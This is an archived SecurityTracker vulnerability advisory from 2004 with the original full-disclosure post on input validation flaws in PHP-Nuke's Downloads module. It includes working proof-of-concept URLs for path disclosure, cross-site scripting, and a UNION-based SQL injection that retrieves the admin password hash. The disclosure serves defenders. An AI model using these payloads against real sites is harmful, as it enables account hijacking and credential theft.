SecurityTracker.com
Keep Track of the Latest Vulnerabilities
with SecurityTracker!
    Home    |    View Topics    |    Search    |    Contact Us    |    Help    |   

SecurityTracker
Archives


Welcome to SecurityTracker!
 
Click to Sign Up
Sign Up
Sign Up for Your FREE Weekly SecurityTracker E-mail Alert Summary
Instant Alerts
Buy our Premium Vulnerability Notification Service to receive customized, instant alerts
Affiliates
Put SecurityTracker Vulnerability Alerts on Your Web Site -- It's Free!
Partners
Become a Partner and License Our Database or Notification Service
Report a Bug
Report a vulnerability that you have found to SecurityTracker
bugs
@
securitytracker.com
Sign Up!





Category:  Application (Forum/Board/Portal)  >  PHP-Nuke Vendors:  Phpnuke.org
PHP-Nuke Input Validation Bugs in 'sid' Variable in 'Downloads' Module Permits SQL Injection and Cross-Site Scripting Attacks
SecurityTracker Alert ID:  1010071
CVE Reference:  GENERIC-MAP-NOMATCH   (Links to External Site)
Date:  May 5 2004
Impact:  Disclosure of authentication information, Disclosure of system information, Disclosure of user information, Execution of arbitrary code via network, Modification of user information
Exploit Included:  Yes  
Version(s): 6.x - 7.2
Description:  Several input validation vulnerabilities were reported in PHP-Nuke. A remote user can inject SQL commands and conduct cross-site scripting attacks. A remote user can also determine the installation path.

Janek Vind "waraxe" reported that the Downloads module does not properly validate user-supplied input in the 'sid' variable. A remote user can execute arbitrary SQL commands on the target system. A demonstration exploit URL is provided:

http://localhost/nuke72/modules.php?name=Downloads&d_op=viewsdo wnload&sid=-1/**/UNION/**/SELECT/**/0,0,aid,pwd,0,0,0,0,0,0,0,0/**/FROM/**/nuke_autho

It is also reported that the Downloads module does not filter HTML code from user-supplied input in the 'ttitle' variable. A remote user can create a specially crafted URL that, when loaded by a target user, will cause arbitrary scripting code to be executed by the target user's browser. The code will originate from the site running the PHP-Nuke software and will run in the security context of that site. As a result, the code will be able to access the target user's cookies (including authentication cookies), if any, associated with the site, access data recently submitted by the target user via web form to the site, or take actions on the site acting as the target user.

Some demonstration exploit URLs are provided:

http://localhost/nuke72/modules.php?name=Downloads&d_op=ratedownload&lid=0&ttitle=[xss
code here]
http://localhost/nuke72/modules.php?name =Downloads&d_op=ratedownload&lid=0&ttitle=<body
onload=document.title=1337>

The 'sid' variable is also affected, the report said.

It is also reported that a remote user can request a URL with an invalid 'show' parameter value to cause the system to display the installation path. A demonstration exploit URL is provided:

http://localhost/nuke72/modules.php?name=Downloads&d_op=viewdownload&cid=2&show=foobar
Impact:  A remote user can access the target user's cookies (including authentication cookies), if any, associated with the site running the PHP-Nuke software, access data recently submitted by the target user via web form to the site, or take actions on the site acting as the target user.

A remote user can inject SQL commands.

A remote user can determine the installation path.
Solution:  No solution was available at the time of this entry.
Vendor URL:  www.phpnuke.org/ (Links to External Site)
Cause:  Access control error, Input validation error
Underlying OS:  Linux (Any), UNIX (Any), Windows (Any)
Reported By:  Janek Vind <come2waraxe@yahoo.com>
Message History:   None.

 Source Message Contents
Date:  Wed, 5 May 2004 08:52:38 -0700 (PDT)
From:  Janek Vind <come2waraxe@yahoo.com>
Subject:  [Full-Disclosure] [waraxe-2004-SA#027 - Once again - critical vulnerabilities in PhpNuke 6.x - 7.2]

 



{================================================================================}
{                              [waraxe-2004-SA#027]   
                          }
{================================================================================}
{                                                     
                          }
{        [ Once again - critical vulnerabilities in
PhpNuke 6.x - 7.2 ]          }
{                                                     
                          }
{================================================================================}
                                                      
                                                      
                  
Author: Janek Vind "waraxe"
Date: 05. May 2004
Location: Estonia, Tartu
Web: http://www.waraxe.us/index.php?modname=sa&id=27


Affected software description:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Php-Nuke is a popular freeware content management
system, written in php by
Francisco Burzi. This CMS (Content Management System)
is used on many thousands
websites, because it's freeware, easy to install and
has broad set of features.

Homepage: http://phpnuke.org


Vulnerabilities:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

A. Full path disclosure:

A1 - unsanitaized user submitted variable "show" can
triger standard php error messages,
revealing full path to script - information, needed
for potential hacker.

Example: make http request like this:

http://localhost/nuke72/modules.php?name=Downloads&d_op=viewdownload&cid=2&show=foobar

and error message appears:

Warning: Division by zero in
D:\apache_wwwroot\nuke72\modules\Downloads\index.php
on line 797


B. Cross-site scripting aka XSS:

XSS can be used for cookie stealing, and because in
PhpNuke authentication-related information
is stored in cookies, account's hijacking and ID spoof
can happen.

B1 - XSS through unsanitaized user submitted variable
"ttitle":

http://localhost/nuke72/modules.php?name=Downloads&d_op=ratedownload&lid=0&ttitle=[xss
code here]
http://localhost/nuke72/modules.php?name=Downloads&d_op=ratedownload&lid=0&ttitle=<bod
y
onload=document.title=1337>


B2 - XSS through unsanitaized user submitted variable
"sid":

http://localhost/nuke72/modules.php?name=Downloads&d_op=viewsdownload&sid=[xss
code here]


C. Sql injection:

C1 - noncritical sql injection through unsanitaized
user submitted variable "orderby":

http://localhost/nuke72/modules.php?name=Downloads&d_op=viewdownload&cid=2&orderby=foobar


C3 - critical sql injection through unsanitaized user
submitted variable "sid":

Let's look at original code from
"nuke72/modules/Downloads/index.php" line 901:


$result=$db->sql_query("
SELECT lid, url, title, description, date, hits,
downloadratingsummary, totalvotes,
totalcomments, filesize, version, homepage
FROM ".$prefix."_downloads_downloads
WHERE sid=$sid
order by $orderby
limit $min,$perpage
");

Oops, "$sid" variable is unquoted in sql query.
Scary...
What, if we request something like:

http://localhost/nuke72/modules.php?name=Downloads&d_op=viewsdownload&sid=-1/**/UNION/**/SELE
CT/**/0,0,aid,pwd,0,0,0,0,0,0,0,0/**/FROM/**/nuke_authors/**/WHERE/**/radminsuper=1/**/LIMIT/**/1/*

Cool - admin's username and password's md5 hash in
plaintext :)

Have a nice day!



Greetings:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Greets to Raido Kerna and to all bugtraq readers in
Estonia! Tervitused!
Special greets to http://www.gamecheaters.us staff!



Contact:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

    come2waraxe@yahoo.com
    Janek Vind "waraxe"

    Homepage: http://www.waraxe.us/

---------------------------------- [ EOF ]
------------------------------------



 
		
__________________________________
Do you Yahoo!?
Win a $20,000 Career Makeover at Yahoo! HotJobs  
http://hotjobs.sweepstakes.yahoo.com/careermakeover 

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html


Go to the Top of This SecurityTracker Archive Page



Home   |    View Topics   |    Search   |    Contact Us   |    Help

Copyright 2004, SecurityGlobal.net LLC